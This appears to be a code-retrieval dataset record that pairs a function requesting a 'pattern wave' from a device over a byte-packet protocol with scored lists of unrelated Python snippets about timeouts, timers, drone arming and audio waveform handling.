"def __init__( self, timeout = 60.0 ):\n\n self.timeout = timeout\n self.alive = None",
"def setdefaulttimeout(timeout):\r\n global default_timeout\r\n default_timeout = timeout",
"def reset_timer(self):\r\n self.time_minutes = 0\r\n self.time_seconds = 0",
"def timeout(time_limit):\n\n class TimeoutException(Exception):\n \"\"\" Subclass Exception to catch timer expiration during search \"\"\"\n pass\n\n def handler(*args, **kwargs):\n \"\"\" Generic handler to raise an exception when a timer expires \"\"\"\n raise TimeoutException(\"Test aborted due to timeout. Test was \" +\n \"expected to finish in less than {} second(s).\".format(time_limit))\n\n def wrapUnitTest(testcase):\n\n @wraps(testcase)\n def testWrapper(self, *args, **kwargs):\n\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(time_limit)\n\n try:\n return testcase(self, *args, **kwargs)\n finally:\n signal.alarm(0)\n\n return testWrapper\n\n return wrapUnitTest",
"def pytest_timeout_cancel_timer(item):\n tle.lib.cancel()\n return True",
"async def test_sleep_timer_services(\n hass: HomeAssistant,\n aioclient_mock: AiohttpClientMocker,\n caplog: pytest.LogCaptureFixture,\n) -> None:\n await init_integration(hass, aioclient_mock)\n\n with patch(\"aiomodernforms.ModernFormsDevice.light\") as light_mock:\n await hass.services.async_call(\n DOMAIN,\n SERVICE_SET_LIGHT_SLEEP_TIMER,\n {ATTR_ENTITY_ID: \"light.modernformsfan_light\", ATTR_SLEEP_TIME: 1},\n blocking=True,\n )\n await hass.async_block_till_done()\n light_mock.assert_called_once_with(sleep=60)\n\n with patch(\"aiomodernforms.ModernFormsDevice.light\") as light_mock:\n await hass.services.async_call(\n DOMAIN,\n SERVICE_CLEAR_LIGHT_SLEEP_TIMER,\n {ATTR_ENTITY_ID: \"light.modernformsfan_light\"},\n blocking=True,\n )\n await hass.async_block_till_done()\n light_mock.assert_called_once_with(sleep=0)",
"def setdefaulttimeout(timeout):\r\n global _TIMEOUT\r\n _TIMEOUT = timeout",
"def timeout(time: int) -> None:\n\n # Defines the signal handler\n def raise_timeout(signum, frame):\n raise TimeoutError\n\n # Register a function to raise a TimeoutError on the signal\n signal.signal(signal.SIGALRM, raise_timeout)\n # Schedule the signal to be sent after specified time\n signal.alarm(time)\n\n try:\n yield\n except TimeoutError:\n pass\n finally:\n # Unregister the signal so it won't be triggered if the timeout is not reached\n signal.signal(signal.SIGALRM, signal.SIG_IGN)",
"def timeout(self):\n self._status_update(\"Pyloton: Timeout\")\n time.sleep(3)",
"def _timeout(signum, frame):\n # Raise TimeoutException with system default timeout message\n raise TimeoutException()",
"def alarm(seconds): # real signature unknown; restored from __doc__\n pass",
"def functionThatWillTimeOut():\n time.sleep(5)",
"def on_timeout(self):\n pass",
"def stop_timer(self):\n self.end_time = datetime.now()",
"def SetBacklightTimeout(self,Timeout):\n self._BacklightTimeout = Timeout",
"def set_timeout(self, timeout: int) -> None:\n raise WatchdogError(\"Setting timeout is not supported on {0}\".format(self.describe()))",
"def time_limit(seconds):\n def signal_handler(signum, frame):\n raise TimeoutException(\"TIMEOUT\")\n signal.signal(signal.SIGALRM, signal_handler)\n signal.alarm(seconds)\n try:\n yield\n finally:\n signal.alarm(0)",
"def set_trigger(self, channel, threshold, delay=0.0, direction='rising', timeout=0.1, enable=True):\n ch = self.convert_to_enum(channel, self.enChannel, to_upper=True)\n if ch.name not in self._channels_dict:\n msg = \"Must call set_channel(channel='{0}', ...) before enabling a trigger with channel {0}\".format(ch.name)\n self.raise_exception(msg)\n\n if self._sampling_interval is None:\n self.raise_exception('Must call set_timebase(...) before setting the trigger')\n\n if ch == self.enChannel.EXT:\n threshold_adu = int(round(self.EXT_MAX_VALUE * threshold/float(self.EXT_MAX_VOLTAGE)))\n else:\n voltage_offset = self._channels_dict[ch.name].voltage_offset\n adu_per_volt = 1.0/self._channels_dict[ch.name].volts_per_adu\n threshold_adu = int(round(adu_per_volt * (threshold + voltage_offset)))\n\n delay_ = int(round(delay / self._sampling_interval))\n if delay < 0:\n msg = 'The trigger delay must be >=0 seconds, requested a delay of {} seconds'.format(delay)\n self.raise_exception(msg)\n elif delay_ > self.MAX_DELAY_COUNT:\n msg = 'The maximum allowed trigger delay is {} seconds, ' \\\n 'requested a delay of {} seconds'.format(self.MAX_DELAY_COUNT*self._sampling_interval, delay)\n self.raise_exception(msg)\n\n trig_dir = self.convert_to_enum(direction, self.enThresholdDirection, to_upper=True)\n auto_trigger_ms = int(round(max(0.0, timeout*1e3)))\n return self.SetSimpleTrigger(self._handle, enable, ch, threshold_adu, trig_dir, delay_, auto_trigger_ms)",
"def setTimeout(self, timeout):\n self.timeout = timeout",
"def __init__(self, seconds):\n super(RobotiqCommandTimeout, self).__init__()\n self.start_time = rospy.get_rostime()\n self.duration = rospy.Duration(seconds)",
"def timeout(self, timeout):\n\n self._timeout = timeout",
"def set_timeout(self, timeout: float) -> None:\n self._timeout = timeout",
"def TimeOutRaiser(signum, frame):\n if( Z3running ):\n raise Exception(\"z3 solver is too slow\")",
"def reset_arm_and_wait(self, arm, mode, data, timeout):\n reset_command = PositionCommand()\n reset_command.mode = mode\n reset_command.data = data\n reset_command.pd_gains = self._hyperparams['pid_params']\n reset_command.arm = arm\n reset_command.id = self._get_next_seq_id()\n self._reset_service.publish_and_wait(reset_command, timeout=timeout)",
"def _banner_timeout(self):\n self.hide_banner()\n self._request_redraw()\n self.sm.on_state_event(self.events.TIMEOUT)",
"def med_timer(self):\n self.start_button.config(text='Sit', state='disabled')\n self.start_button.update()\n if self.mins.get() == \"\":\n num_mins = 0\n else:\n num_mins = float(self.mins.get())\n time_in_seconds = num_mins * 60\n self.t = Timer(time_in_seconds, self.play_wav)\n self.t.start()",
"def test_timeout(self, mocker, mock_timedelta):\n\n tid = 289466\n site = \"mysite\"\n\n exception_response = self.generate_task_dictionary(\n tid, state=\"started\", completed=None\n )\n\n responses = [{\"json\": exception_response}]\n url = (\n \"https://cloudapi.acquia.com/v1/\"\n \"sites/prod:{site}/tasks/{tid}.json\".format(tid=tid, site=site)\n )\n\n mocker.register_uri(\"GET\", url, responses)\n\n with self.assertRaises(exceptions.AcquiaCloudTimeoutError):\n self.client.site(site).task(tid).wait(0)",
"def _ims_res_timing(self) -> None:\n self._ims_res_timer.start(500)",
"def create_timer(function, time):\n timer = Timer()\n timer.timeout.connect(function)\n timer.start(time)\n timer.speed = time\n return timer",
"def _no_motion_for_long_time(self, *_args, **_kwargs):\n light_st = self.get_state(self._light_group)\n self._light_on = light_st == \"on\"\n\n if not self._light_on:\n return\n\n now = monotonic()\n self.log(\n f\"NO MOTION FOR A LONG TIME (since {self._last_light_on:.0f} s)-> \"\n f\"{self._motion_states} / {self._motion_on}. \"\n f\"Handler off={self._handler_turn_off_lights}\",\n log=LOGGER,\n )\n if (\n (now - self._last_light_on > self._max_delay_motion_off - 1)\n and (now - self._last_switch_press > self._max_switch_delay())\n ) or (\n self._handler_turn_off_lights is None\n ):\n # Safety turn off\n self.log(\n f\"TURN OFF LIGHTS AFTER NO MOTION FOR A LONG TIME\",\n level=\"ERROR\",\n log=LOGGER,\n )\n self._turn_lights_off()",
"def raise_arm(self):\r\n self.arm_motor.turn_on(self.speed)\r\n while not self.arm_touch_sensor.is_pressed():\r\n pass\r\n self.arm_motor.turn_off()\r\n\r\n # ---------------------------------------------------------------------\r\n # Done: 6. Implement this method; it is a ONE-LINER! (not)\r\n # ---------------------------------------------------------------------\r",
"def arm():\n\n\tprint \"In arm state\"\n\n\tglobal cs, cc\n\tglobal state\n\n\tmsg = cs.recv(BUF_SIZE) \n\n\tif msg != 'ARM':\n\t\terror(msg)\n\t\tstate = 6 # exit failure\n\telse:\n\t\tcc.arm()\n\t\tcc.set_mode('GUIDED')\n\t\t\n\t\tto = time.time() + TIMEOUT\n\t\twhile not cc.is_armed() and cc.get_mode_name() != 'GUIDED':\n\t\t\tif time.time() > to:\n\t\t\t\tcs.send('TIMEOUT')\n\t\t\t\tstate = 6\n\t\t\t\treturn\n\t\t\ttime.sleep(0.1)\n\t\t\n\t\tcs.send('Armed')\n\t\tstate += 1",
"def reset_timeout(self) -> float:\n return self._reset_timeout",
"def test_lock_timeout_loop():\n lock_unlock_timeout(0.2)",
"def setTimeOut(self, sec):\n if (sec is not None) and (sec > 0):\n to = sec\n else:\n to = None\n self._simulator_.update(timeout=to)\n\n return",
"async def async_turn_off(self, **kwargs) -> None:\n await self._zone.set_mode(\"timer\")",
"def drain_timeout_in_minutes(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"drain_timeout_in_minutes\")",
"def test_lock_timeout():\n lock_unlock_timeout(0)",
"def restart_motion_timer(self) -> None:\n if \"motion_timer\" in self.handles:\n self.adbase.cancel_timer(self.handles[\"motion_timer\"])\n self.handles.pop(\"motion_timer\")\n self.handles[\"motion_timer\"] = self.adbase.run_in(\n self.disable_area_motion, self.delay_off\n )",
"def checkTimeout(self):\n if TIMEOUT <= (datetime.now() - self.clockCheckStop).total_seconds():\n print('Didn\\'t received messages for 1 minute - Program ends')\n exit(0)",
"def arm_and_takeoff(aTargetAltitude):\n\n print ('Basic pre-arm checks')\n # Don't try to arm until autopilot is ready\n while not vehicle.is_armable:\n print ('Waiting for vehicle to initialise...')\n time.sleep(1)\n\n \n print ('Arming motors')\n # Copter should arm in GUIDED mode\n vehicle.mode = VehicleMode(\"GUIDED\")\n vehicle.armed = True \n\n # Confirm vehicle armed before attempting to take off\n while not vehicle.armed: \n print ('Waiting for arming...')\n time.sleep(1)\n\n print ('Taking off!')\n vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude\n\n while True:\n # print \"Global Location (relative altitude): %s\" % vehicle.location.global_relative_frame\n if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.95: \n break\n time.sleep(1)",
"def test_custom_time(self):\n interval = 0.5\n M = simulation.StateMonitor(self.G, 'v', interval=interval)\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n self.assertTrue(np.allclose(M.t, np.arange(0, self.t_max, interval)))",
"def arm_and_takeoff(aTargetAltitude):\n\n print(\"Basic pre-arm checks\")\n # Don't let the user try to arm until autopilot is ready\n while not vehicle.is_armable:\n print(\" Waiting for vehicle to initialise...\")\n time.sleep(1)\n\n \n print(\"Arming motors\")\n # Copter should arm in GUIDED mode\n vehicle.mode = VehicleMode(\"GUIDED\")\n vehicle.armed = True\n\n while not vehicle.armed: \n print(\" Waiting for arming...\")\n time.sleep(1)\n\n print(\"Taking off!\")\n vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude\n\n # Wait until the vehicle reaches a safe height before processing the goto (otherwise the command \n # after Vehicle.simple_takeoff will execute immediately).\n while True:\n print(\" Altitude: \", vehicle.location.global_relative_frame.alt) \n if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.9: #Trigger just below target alt.\n print(\"Reached target altitude\")\n break\n time.sleep(1)",
"def stopped_check(self, timeout=None):",
"def timeout_function(seconds=5):\n\n def signal_handler(signum, frame):\n raise TimeoutError(\"Timed out!\")\n\n signal.signal(signal.SIGALRM, signal_handler)\n signal.alarm(seconds)\n\n try:\n yield\n finally:\n signal.alarm(0)"
] | [
"0.68168837",
"0.6529387",
"0.61601263",
"0.60441667",
"0.59999216",
"0.59811276",
"0.5938586",
"0.5874886",
"0.58427435",
"0.5785943",
"0.5688475",
"0.56534606",
"0.56367904",
"0.563389",
"0.5626759",
"0.5621003",
"0.56125724",
"0.56084305",
"0.5593728",
"0.55809",
"0.55778444",
"0.5572736",
"0.5571767",
"0.55514604",
"0.551192",
"0.5495423",
"0.5482235",
"0.54805297",
"0.5469997",
"0.54680365",
"0.5460496",
"0.5460205",
"0.54529834",
"0.5452933",
"0.5431624",
"0.54228514",
"0.5413716",
"0.5410594",
"0.54003054",
"0.53983265",
"0.5390095",
"0.53897923",
"0.5385856",
"0.53788334",
"0.53772277",
"0.537451",
"0.5370083",
"0.53617084",
"0.53570735",
"0.5351354",
"0.53486687",
"0.534412",
"0.53373766",
"0.5336915",
"0.5333564",
"0.533175",
"0.53179175",
"0.5306667",
"0.5295001",
"0.528193",
"0.5280276",
"0.52713007",
"0.52530205",
"0.5252253",
"0.52400184",
"0.5233631",
"0.5230823",
"0.52278537",
"0.52175045",
"0.5208059",
"0.5205792",
"0.5203758",
"0.51993394",
"0.5191307",
"0.5184051",
"0.51743174",
"0.5174071",
"0.51704144",
"0.51644653",
"0.5164356",
"0.51600647",
"0.51598674",
"0.51592964",
"0.51556355",
"0.5142224",
"0.5139794",
"0.5137177",
"0.51354045",
"0.5134674",
"0.5134038",
"0.5126756",
"0.5122052",
"0.5118369",
"0.511523",
"0.51147443",
"0.5094395",
"0.5089951",
"0.508278",
"0.50811565",
"0.5078297"
] | 0.6253944 | 2 |
Gets the pattern wave pat_wave 101011110011 .... >>> Request >>> 0> >>> Pattern Wave [More to follow] >>> >> Request Next block >>> 0> >>> Pattern Wave [More to follow] >>> >> >>> ..... >>> >>> Request Next block >>> 0> >>> Pattern Wave [No More to follow] >>> <) | def __request_pat_wave(self, r_number):
packet = bytearray()
packet.append(0) # 16 bit options
packet.append(0) # 8 bit options
packet.append(1) # Request the 1 option
# ---------------------------------------------------------------------
# Request the variable length options. pattern wave.
packet.append(0x01 << t_var_size_Options.PATTERN_WAVE)
# ---------------------------------------------------------------------
# Packets to follow
packet.append(r_number)
# ---------------------------------------------------------------------
# Length of the bytes to follow
packet.append(0)
rval = self.interact_with_shouter(packet)
if rval != False:
return rval
return [] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def wave(self):\n return self._wave",
"def waveband(self):\n return self.get(\"waveband\")",
"def waveband(self):\n return self.get(\"waveband\", default=\"\", decode=True).split(\"#\")",
"def _wave(self):\n try:\n return wave.open(StringIO(self.contents))\n except wave.Error, err:\n err.message += \"\\nInvalid wave file: %s\" % self\n err.args = (err.message,)\n raise",
"def getWave(self):\n return self._wave",
"def getPattern(self):\n return self.pattern",
"def get_wstart(ref, wave_ref, wave_per_pixel):\n\n return wave_ref - ((ref-1) * wave_per_pixel)",
"def waveband(self):\n return self._band",
"def wave_tx_repeat():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVGOR, 0, 0))",
"def get_waveforms(self, network, station, location, channel, starttime,\n endtime):\n # padding channel with spaces does not make sense\n if len(channel) < 3 and channel != \".*\":\n msg = \"channel expression matches less than 3 characters \" + \\\n \"(use e.g. 'BHZ', 'BH?', 'BH[Z12]', 'B??')\"\n raise Exception(msg)\n seedname = '%-2s%-5s%s%-2s' % (network, station, channel, location)\n # allow UNIX style \"?\" wildcard\n seedname = seedname.replace(\"?\", \".\")\n return self.get_waveforms_nscl(seedname, starttime,\n endtime - starttime)",
"def getRicker(f,t):\n # assert len(f) == 1, 'Ricker wavelet needs 1 frequency as input'\n # f = f[0]\n pift = pi*f*t\n wav = (1 - 2*pift**2)*np.exp(-pift**2)\n return wav",
"def get_waveform_halfwidth(waveform, sampling_rate=30000.):\n w = resample(waveform,200)#upsample to smooth the data\n time = np.linspace(0,len(waveform)/sampling_rate,200)\n trough = np.where(w==np.min(w))[0][0]\n peak = np.where(w==np.max(w))[0][0]\n \n #dur = time[trough:][np.where(w[trough:]==np.max(w[trough:]))[0][0]] - time[trough]\n if w[peak] > np.abs(w[trough]):\n dur = time[peak:][np.where(w[peak:]>=0.5*np.min(w[peak:]))[0][0]] - time[peak] \n else:\n dur = time[trough:][np.where(w[trough:]<=0.5*np.max(w[trough:]))[0][0]] - time[trough] \n if peak<trough:\n dur=-dur\n return dur",
"def wave_parameters(self):\n return self._wave_params",
"def rec_one_shot(self, sec, file_name=None):\n self.__open_noncallback_stream()\n frames = []\n for i in range(int(self.RATE / self.CHUNK * sec)):\n data = self.stream.read(self.CHUNK)\n data = np.fromstring(data, dtype=np.int16)\n frames.append(data)\n self.stream.stop_stream()\n if file_name is not None:\n with wave.open(file_name, 'wb') as wav_file:\n wav_file.setnchannels(self.CHANNELS)\n wav_file.setsampwidth(self.recorder.get_sample_size(self.FORMAT))\n wav_file.setframerate(self.RATE)\n wav_file.writeframes(b''.join(frames))\n frame = np.concatenate(frames, 0)\n self.stop_streaming()\n return frame",
"def pattern(self):\n return self.get_data(\"pattern\")",
"def wave_samples(self):\n return self._quantized_subsamples",
"def test_signal(self, data = \"MODE=init\"):\n resdat = wavehttp.get(\"/wave/wfe/test?VER=6&\"+data+\"&zx=\"+self.zx()+\"&t=1\")\n return resdat",
"def wave_send_repeat(wave_id):\n return _u2i(_pigpio_command(_control, _PI_CMD_WVTXR, wave_id, 0))",
"def askwave(self):\n if self.status != \"not connected\":\n m = self.serial\n m.write(\"wave?\" + \"\\r\\n\")\n r = m.read(100)\n r = r[7:]\n result = string.strip(r)\n return result\n else:\n pass",
"def pattern(self):\n return self[\"pattern\"]",
"def pattern(self):\n return self[\"pattern\"]",
"def modulate(data):\n\n wave = ''\n levels = ('\\x00', '\\x55', '\\xaa', '\\xff')\n \n for frame in data:\n next_num = frame\n for grp in range(4):\n wave += levels[next_num % 4]\n next_num /= 4\n\n return wave",
"def rate(self):\n if self._rate:\n return self._rate\n else:\n return self._wave.getframerate()",
"def record_and_get_wav(self, time):\n sample_width, frames = self.record_audio(time)\n return WavFile(samples=frames, sample_width=sample_width, time=time)",
"def do_wave(l, wave_type, r, g, b, duration, repeat):\n command = create_wave_command(\n wave_type, r, g, b, duration, repeat\n )\n l.write(command)",
"def read_wave(path):\n with contextlib.closing(wave.open(path, 'rb')) as wf:\n num_channels = wf.getnchannels()\n assert num_channels == 1\n sample_width = wf.getsampwidth()\n assert sample_width == 2\n sample_rate = wf.getframerate()\n assert sample_rate in (8000, 16000, 32000)\n pcm_data = wf.readframes(wf.getnframes())\n return pcm_data, sample_rate",
"def __next_chunk_pattern(self, chunk_sectors:int):\n\t\tcurr_pat = next(self.pat_it, None)\t\t\t\n\n\t\tif (curr_pat is None):\n\t\t\tself.__reset_pat()\n\t\t\tcurr_pat = next(self.pat_it, None)\n\t\t\t\t\t\n\t\treturn bytearray(curr_pat[0:chunk_sectors * 512])",
"def spectral(w, s=1.0):\n n_in, n_out = w.size()\n n = max(n_out, n_in)\n gain = s / math.sqrt(n)\n return w.normal_(0, 1).mul_(gain)",
"def wav(self):\n if self._wav is None and self._nu is not None:\n return self._nu.to(u.micron, equivalencies=u.spectral())\n else:\n return self._wav",
"def get_pattern(self, name):\n return self._pattern_reg[name]",
"def get_silence(self, duration):\n nsamples = int(self.sample_rate * duration)\n return \"\".join([wave.struct.pack('h', 0) for i in range(0, nsamples)])",
"def wave_tx_busy():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVBSY, 0, 0))",
"def analyzeWAV(inputFile):\n data, fs, nbits = audiolab.wavread(inputFile)\n samplingRate = fs\n return [data, samplingRate]",
"def get_wav_info(file_name):\n wr = wave.open(file_name, 'r')\n sample_width = wr.getsampwidth()\n frame_rate = wr.getframerate()\n num_frames = wr.getnframes()\n n_channels = wr.getnchannels()\n s = \"sample width: {} bytes\\n\".format(sample_width) + \\\n \"frame rate: {} Hz\\n\".format(frame_rate) + \\\n \"num frames: {}\\n\".format(num_frames) + \\\n \"track length: {} s\\n\".format(num_frames / frame_rate) + \\\n \"num channels: {}\\n\".format(n_channels)\n\n return s",
"def get_signal(self, audio, gain, phase):\n max_delay_ms = self.center_ms + self.depth_ms\n max_length_samples = int(self.sample_rate / 1000.0 * max_delay_ms)\n\n depth_phase = self.depth_ms / max_delay_ms\n center_phase = self.center_ms / max_delay_ms\n phase = phase * depth_phase + center_phase\n wet_audio = core.variable_length_delay(\n audio=audio, phase=phase, max_length=max_length_samples\n )\n # Remove channel dimension.\n if gain.dim() == 3:\n gain = gain[:, 0, :]\n\n wet_audio *= gain\n return (wet_audio + audio) if self.add_dry else wet_audio",
"def pattern(self) -> str:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> str:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> str:\n return pulumi.get(self, \"pattern\")",
"def pattern(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"pattern\")",
"def wave(methodcnt): # NOTE - INSTANTIATE WITH SPECIAL CASE\n\tprint (\"waving\")\n\t#\treact_with_sound(confirmation_final)\n\treturn 0",
"def sp_audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n sig = sig.unsqueeze(0)\n sig = hparams[\"speed_perturb\"](sig)\n sig = sig.squeeze(0)\n return sig",
"def get_wave(q):\n\n approximant = 'SEOBNRv4'\n chi1 = [0,0,0]\n chi2 = [0,0,0]\n deltaTOverM = 0.1\n omega0 = 2e-2\n\n t, h = LALPy.generate_LAL_waveform(approximant, q, chi1, chi2, deltaTOverM, omega0)\n\n Amp = np.abs(h)\n peakIdx = np.argmax(Amp)\n\n t -= t[peakIdx]\n\n tmin = -500\n if min(t) > tmin:\n raise Exception('Data not long enough, decrease omega0.')\n keepIdx = t - tmin > -1e-3 # simple hack to ensure t_vec is always nearly the same\n t = t[keepIdx]\n h = h[keepIdx]\n\n tmax = 100\n keepIdx = t - tmax < 1e-3\n t = t[keepIdx]\n h = h[keepIdx]\n\n return t, h",
"def wave_get_pulses():\n return _u2i(_pigpio_command(_control, _PI_CMD_WVSP, 0, 0))",
"def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig",
"def audio_pipeline(wav):\n sig = sb.dataio.dataio.read_audio(wav)\n return sig",
"def sample(wave, factor):\n ys = np.zeros(len(wave))\n ys[::factor] = np.real(wave.ys[::factor])\n return Wave(ys, framerate=wave.framerate)",
"def getLastWave(self):\n lastWave=dict()\n lastWave['identifier']=self.lastWaveIdentifier\n lastWave['samplingTime']=self.lastSamplingTime\n lastWave['transferedChannels']=self.lastTransferredChannel\n lastWave['transferAverage']=self.lastTransferAverage\n lastWave['nbrSegmentArray']=self.lastNbrSegmentsArray\n lastWave['nbrSamplesPerSeg']=self.lastNbrSamplesPerSeg\n lastWave['waveSizes']=self.lastWaveformArraySizes\n lastWave['wave']=self.lastWaveformArray\n lastWave['timeStampsSize']=self.lastTimeStampsArraySize\n lastWave['timeStamps']=self.lastTimeStampsArray\n lastWave['horPosSize']=self.lastHorPositionsArraySize\n lastWave['horPos']=self.lastHorPositionsArray\n lastWave['averageCalculated']=self.lastAverageCalculated \n lastWave['lastAverageArray']=self.lastAverageArray \n return lastWave",
"def get_phrase(self):\n counter = 30 # give us a full 2 seconds of time to start\n\n with closing(self.Mic()) as mic:\n log.info('Recording phrase.')\n while True:\n frames = mic.next()\n\n score, has_disturbance = self.scorer.add(frames)\n\n if counter < 15 and has_disturbance:\n log.info('Recording more in phrase.')\n counter = 15\n else:\n counter -= 1\n\n if counter >= 1:\n yield frames",
"def get_file_bpm(path, params = {}):\n try:\n win_s = params['win_s']\n samplerate = params['samplerate']\n hop_s = params['hop_s']\n except:\n \"\"\"\n # super fast\n samplerate, win_s, hop_s = 4000, 128, 64 \n # fast\n samplerate, win_s, hop_s = 8000, 512, 128\n \"\"\"\n # default:\n samplerate, win_s, hop_s = 44100, 1024, 512\n\n s = source(path, samplerate, hop_s)\n samplerate = s.samplerate\n o = tempo(\"specdiff\", win_s, hop_s, samplerate)\n # List of beats, in samples\n beats = []\n # Total number of frames read\n total_frames = 0\n\n while True:\n samples, read = s()\n is_beat = o(samples)\n if is_beat:\n this_beat = o.get_last_s()\n beats.append(this_beat)\n #if o.get_confidence() > .2 and len(beats) > 2.:\n # break\n total_frames += read\n if read < hop_s:\n break\n\n # Convert to periods and to bpm \n bpms = 60./diff(beats)\n b = median(bpms)\n return b",
"def _get_pulse_shaping_waveform(self):\n self.pulse_shaping_list = []\n # Make the rise time be 3.3333% if the dot time.\n rise_time_in_msec = 0.03333333333333 * self.dot_time_in_msec\n # Limit the rise time to 2 milliseconds.\n if rise_time_in_msec > 0.002:\n rise_time_in_msec = 0.002\n rising_falling_count = int(rise_time_in_msec * self.sample_rate)\n step = math.pi / rising_falling_count\n # The first value is zero, so skip that value.\n # The last value is 1.0, so skip that value too.\n for i in range(1, rising_falling_count - 1):\n gain = 0.5 * (1.0 - math.cos(step * i))\n self.pulse_shaping_list.append(gain)",
"def view_wave(request, wave, ratio=1.6, dpi=144, **kwargs):\n\n fig = Figure(figsize=(5 * ratio,5), dpi=dpi)\n fig.patch.set_facecolor('white')\n axes = fig.add_subplot(111)\n axes.set_xlabel(\"Time (s)\", fontsize=8)\n plot.subplot_waveform(wave, axes, **kwargs)\n process_plot_args(request, axes)\n canvas = FigureCanvas(fig)\n response = HttpResponse(content_type='image/png')\n fig.tight_layout()\n canvas.print_png(response)\n return response",
"def get_tone(self, call_vector, duration):\n if duration == 0:\n return\n nsamples = int(self.sample_rate * duration)\n values = []\n fvector = (self.fm_freq, self.hfm_freq, self.sv_freq)\n for i in range(0, nsamples):\n try:\n if type(fvector[1]) == tuple:\n tone = self.__get_waveval2(i, call_vector, fvector)\n else:\n tone = self.__get_waveval(i, call_vector, fvector)\n except ValueError:\n print \"ERROR: Sum of calls cannot exceed max calls\"\n print \"Cleaning up...\"\n print \"No files written.\"\n os.remove(self.output)\n exit(1)\n signal = wave.struct.pack('h', tone) # convert to binary\n values.append(signal)\n value_string = \"\".join(values)\n return value_string",
"def wavematch(w, wp, sl, wlimit=10):\n\n # first remove anything already in the self.wp from the sl list\n lines = []\n for x in sl:\n if x not in wp:\n lines.append(x)\n if not lines:\n return -1\n lines = np.array(lines)\n\n # find the best match\n dist = abs(lines - w)\n if dist.min() < wlimit:\n i = dist.argmin()\n else:\n return -1\n\n # return the values\n return lines[i]",
"def build_pulse_waveform(startper,endper):\r\n mywaveform = numpy.zeros(100, dtype=numpy.int)\r\n if startper > endper:\r\n mywaveform[0:endper]=1\r\n mywaveform[startper:100]=1\r\n else:\r\n mywaveform[startper:endper]=1 \r\n return mywaveform",
"def captured_signal(waveform, shift, p):\n return time_varying_delay(waveform, shift, p)",
"def get_pattern(self, name):\n return self.__patterns[name]",
"def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, input_device_index=0, channels=1, rate=RATE, input=True, output=True, frames_per_buffer=CHUNK_SIZE)\n num_silent = 0\n snd_started = False\n\n r = array('h')\n while 1:\n snd_data = array('h', stream.read(CHUNK_SIZE, exception_on_overflow = False))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n print(\"Sound started.\")\n snd_started = True\n\n if snd_started and num_silent> 10:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n #r = trim(r)\n #r = add_silence(r, 0.5)\n return sample_width, r",
"def record():\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=1, rate=RATE,\n input=True, output=True,\n frames_per_buffer=CHUNK_SIZE)\n\n num_silent = 0\n snd_started = False\n\n r = array('h')\n\n while 1:\n # little endian, signed short\n snd_data = array('h', stream.read(CHUNK_SIZE))\n if byteorder == 'big':\n snd_data.byteswap()\n r.extend(snd_data)\n\n silent = is_silent(snd_data)\n\n if silent and snd_started:\n num_silent += 1\n elif not silent and not snd_started:\n snd_started = True\n\n if snd_started and num_silent > 30:\n break\n\n sample_width = p.get_sample_size(FORMAT)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n r = normalize(r)\n r = trim(r)\n r = add_silence(r, 0.5)\n return sample_width, r",
"def testWaveform(self):\n\n\t\twg = waveform.Generator(frequency=Quantity(2, 'Hz'))\n\n\t\twg.delay(Quantity(2, 's'))\n\t\twg.marker(1, True)\n\t\twg.marker(2, True)\n\t\twg.pulse([], 0.5, Quantity(1, 's'))\n\t\twg.pulse([1.0, 0.0, -1.0], 1.0, Quantity(3, 's'))\n\t\twg.marker(1, False)\n\t\twg.square(-0.5, Quantity(2, 's'))\n\n\t\texpected = [0.0, 0.0, 0.0, 1.0, 0.6, 0.2, -0.2, -0.6, -1.0, -0.5, -0.5, -0.5, -0.5, -1.0]\n\n\t\twave, markers = wg.waveform\n\t\tassert_array_almost_equal(wave, expected, 4)\n\t\teq_(markers[1], [False] * 3 + [True] * 6 + [False] * 5)\n\t\teq_(markers[2], [False] * 3 + [True] * 11)\n\t\tassert 3 not in markers",
"def custom_sound(type_of, attack, decay, cutoff, coef, time, freq):\n dzw = np.zeros(time*44100)\n l=0\n for i in type_of:\n if i==\"sin\":\n dzw+= coef[l]*sin_custom(freq,time,attack[l],decay[l])\n if i==\"sq\":\n dzw+= coef[l]*sq_custom(freq,time,attack[l],decay[l])\n if i==\"saw\":\n dzw+= coef[l]*saw_custom(freq,time,attack[l],decay[l])\n l+=1 \n dzw[(1-cutoff)*time*44100 -1:]==0\n dzw = np.repeat(dzw,2).reshape(len(dzw),2)\n dzw = dzw/np.amax(dzw)\n return(dzw)",
"def getWaveform(self, ch=\"CH1\", samples=2500):\n\t\tself.isReady()\n\t\tcounter = 1\n\t\twhile True:\n\t\t\ttry:\t\t\n\t\t\t\twaveform = self.osc.get_waveform(source = ch, start = 1, stop = samples)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tprint(\"Retry: \" + str(counter))\n\t\t\t\tcounter += 1\n\t\ty_array = []\n\t\tfor x,y in waveform:\n\t\t\ty_array.append(y)\n\t\treturn y_array",
"def waveforms(self):\n return list(self._waveforms)",
